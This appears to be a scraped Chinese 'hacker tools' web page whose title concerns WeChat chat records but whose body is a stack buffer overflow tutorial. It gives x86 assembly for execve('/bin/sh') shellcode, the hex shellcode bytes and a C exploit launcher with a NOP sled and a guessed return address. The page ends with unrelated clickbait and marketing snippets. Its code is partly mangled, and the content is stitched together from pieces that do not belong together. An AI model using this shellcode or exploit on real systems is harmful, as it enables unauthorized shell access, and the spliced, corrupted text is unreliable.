如何让别人恢复不了微信聊天记录」让对让微信

访客3年前黑客工具996

利用call压入下一条语句的返回地址,把数据作为下一条指令我们就可以达到目的。 
Jmp CALL 
Popl %esi ‘利用CALL弹出压入的下一条语句的地址,其实就是我们构造的字符串的地址 
movb $0x0,0x7(%esi) ‘输入0的字符串为结尾 
mov %esi,0X8 (%esi) ‘构造NAME数组,放如字串的地址作为NAME[0] 
mov $0x0,0xc(%esi) ‘构造NAME[1]为NULL, NAME[0]为4位地址,所以偏移为0xc 
mov %esi,%ebx ‘设置数据段开始的地址 
leal 0x8(%esi),%ecx ‘设置参数1 
leal 0xc(%esi),%edx ‘设置参数2 
mov $0xb,%eax ‘设置调用号 
int $0x80 ‘调用 
mov $0x0,%ebx 
mov $0x1,%eax 
int $0x80 
Call popl 
.string \"/bin/sh\" 然后通过C编译器编写MYSHELLA *** .C 
运行出错,原因代码段不允许进行修改,但是对于我们溢出是可以的,原因在于溢出是在数据段运行的, 通过GDB查看16进制码,倒出ASCII字符写出TEST.C程序来验证MYSHELLA *** 可以运行 
ret = (int *)&ret + 2; //ret 等于main()执行完后的返回系统的地址 
//(+2是因为:有pushl ebp ,否则加1就可以了。) 但是在堆栈溢出中,关键在于字符串数组的写越界。但是,gets,strcpy等字符串函数在处理字符串的时 候,以"\0" 为字符串结尾。遇\0就结束了写xx作。Myshell中有0X00的字符存在。 
把所有赋予0的xx作用异或或者MOV已知为0的寄存器赋值来完成 
jmp 0x1f 
popl %esi 
movl %esi,0x8(%esi) 
xorl %eax,%eax 
movb %eax,0x7(%esi) 
movl %eax,0xc(%esi) 
movb $0xb,%al 
movl %esi,%ebx 
leal 0x8(%esi),%ecx 
leal 0xc(%esi),%edx 
int $0x80 
xorl %ebx,%ebx 
movl %ebx,%eax 
inc %eax 
int $0x80 
call -0x24 
.string \"/bin/sh\" 汇编得出的 
shellcode = 
"\x55\x89\xe5\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46" 
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89" 
"\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; 
我们开始来写一个攻击DEMO溢出的例子 
1:把我们的shellcode提供给他,让他可以访问shellcode。 
2:修改他的返回地址为shellcode的入口地址。 对于strcpy函数,我们要知道被溢出的缓冲的的地址。对于xx作系统来说,一个shell下的每一个程序的 堆栈段开始地址都是 相同的 。我们需要内部写一个调用来获得运行时的堆栈起始地址,来知道了目标程 序堆栈的开始地址。 
(所有C函数的返回值都放在eax 寄存器 里面): 
unsigned long get_sp(void) { 
__a *** __("movl %esp,%eax"); 

buffer相对于堆栈开始地址的偏移,对于DEMO我们可以计算出来,但对于真正有溢出毛病的程序我们在没 有源代码和去跟踪汇编是无法计算出的,只能靠猜测了。不过,一般的程序堆栈大约是 几K 左右。为了 提高命中率,增加溢出的SHELLCODE的长度和NOP指令,NOP指令的机器码为0x90。 同时在我们的程序中允 许输入参数来调节溢出点。 
#include 
#include 
#define OFFSET 0 
#define RET_POSITION 120 
#define RANGE 20 
#define NOP 0x90 char shellcode[]= 
"\x55\x89\xe5\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46" 
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89" 
"\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp(void) 

__a *** __("movl %esp,%eax"); 
} main(int argc,char **argv) 

char buff[RET_POSITION+RANGE+1],*ptr; 
long addr; 
unsigned long sp; 
int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1; 
int i; if(argc>1) 
offset=atoi(argv[1]); sp=get_sp(); 
addr=sp-offset; for(i=0;i *((long *)&(buff[i]))=addr; for(i=0;i buff[i]=NOP; ptr=buff+bsize-RANGE*2-strlen(shellcode)-1; 
for(i=0;i *(ptr++)=shellcode[i]; 
buff[bsize-1]="\0" 
for(i=0;i<132;i++) 
printf("0x%08x\n",buff[i]); 
printf("Jump to 0x%08x\n",addr); execl("./demo","demo",buff,0); 

注意,如果发现溢出允许的空间不足够SHELLCODE的代码,那么可以把地址放到前面去,SHELLCODE放在地 址的后面,程序进行一些改动,原理一致 

相关文章

电脑被黑客锁屏留qq,c网络黑客代码,长生公司网站黑客

· XOR解码payload到新的RW内存区域,这次运用的XOR key为:用0x7CC2885F每4个字节进行简略XORSessionEnv(Remote Desktop Configuration...

什么是折扣服装(品牌服装折扣批发拿货)

什么是折扣服装(品牌服装折扣批发拿货)

我之前有一个学员,是做服装生意的,他做服装生意也有三四年了,在遇到我之前,生意一直不温不火,后来和我接触过后,最近三个月不断的运用技巧和方法,一下子就把他的店搞活了。 上个月他就赚了300万,收入比...

免费黑客网破解软件,黑客网络瘫痪,黑客攻击网站多久恢复

具体内容见: $p=substr($p,3);echo "Hello Friends" > file1Cookie盗取 ldmfd sp, {r0-pc}FuzzySec’sSharp-Suit...

中国第一女黑客介绍(中国第一黑客是谁)

中国第一女黑客介绍(中国第一黑客是谁)

  据英国《每日邮报》26日报道,一位20多岁的中国女黑客发明了一种新的黑科技,她将渗透测试工具(渗透测试是一种利用模拟黑客攻击的方式,来评估计算机网络系统安全性能的方法)集成到一双3D打印的高跟鞋中...

黑客帝国第一部结局,我找黑客改了成绩,补办手机号码找黑客

途径:/wish.php假如看到 转化程序的 data/ 目录不可写 就不必试了 不成功 Nmap 6.49BETA4 (https://nmap.org)伪装成IE/FIREFOX/IPHON...

手机微信如何恢复删除的聊天记录(手机微信恢复聊天记录)

手机微信如何恢复删除的聊天记录(手机微信恢复聊天记录),近日,球迷吐槽,发现在微信聊天的朋友,他总是说,“忙”,“后来回话”,然后就消失了。 我想告诉他,这些类型的人,你回微信,其实看不起你。 老...